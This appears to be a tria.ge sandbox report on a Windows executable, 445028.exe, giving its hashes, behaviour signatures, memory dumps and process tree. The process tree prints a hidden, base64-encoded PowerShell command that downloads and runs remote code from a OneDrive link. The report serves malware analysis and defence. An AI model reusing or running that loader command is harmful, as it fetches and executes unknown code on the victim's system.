Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

445028.exe

windows7-x64

1

445028.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    13/02/2024, 15:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    445028.exe

  • Size

    21KB

  • MD5

    b5f4acf9b2cf875975fcea588200f823

  • SHA1

    7af2452548b77bdb864549981d467144508e73a1

  • SHA256

    d74db56a8d42ee4a9d4c7ed90a09ecb192c4bdab6bd740a862ff2cd10e579589

  • SHA512

    33abc7207a109cec3581b22a69fc400a29e2da3b794bce389364c2f427c249a3a563542df91b11ab1aeb5ed6d6be7385cabc759d4f3ca2180e5708393fcbc852

  • SSDEEP

    384:gGOjn5D28LsWPIpaj8deyMEZjsL9y1lemRQ5bYagD/qS9:UFVK/H9

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\445028.exe
    "C:\Users\Admin\AppData\Local\Temp\445028.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -WindowStyle Hidden -enc SQBFAFgAIAAoACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJwBoAHQAdABwAHMAOgAvAC8AbwBuAGUAZAByAGkAdgBlAC4AbABpAHYAZQAuAGMAbwBtAC8AZABvAHcAbgBsAG8AYQBkAD8AcgBlAHMAaQBkAD0AOQBEADkARAAzAEYAMABDADMANQAzAEYAQQBFADYAQQAlADIAMQAxADMANAAmAGEAdQB0AGgAawBlAHkAPQAhAEEASgBvAFMARQA5AGQAUwBjADgAcQAwAHMAYQB3ACcAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACkA
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2776

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1812-0-0x00000000011C0000-0x00000000011CA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1812-1-0x000007FEF5770000-0x000007FEF615C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1812-2-0x000000001A850000-0x000000001A8D0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1812-3-0x000007FEF5770000-0x000007FEF615C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2776-8-0x000000001B360000-0x000000001B642000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2776-9-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2776-10-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2776-11-0x00000000024A0000-0x0000000002520000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2776-12-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2776-13-0x00000000024A0000-0x0000000002520000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2776-14-0x00000000024A0000-0x0000000002520000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2776-15-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

    Filesize

    9.6MB

    Download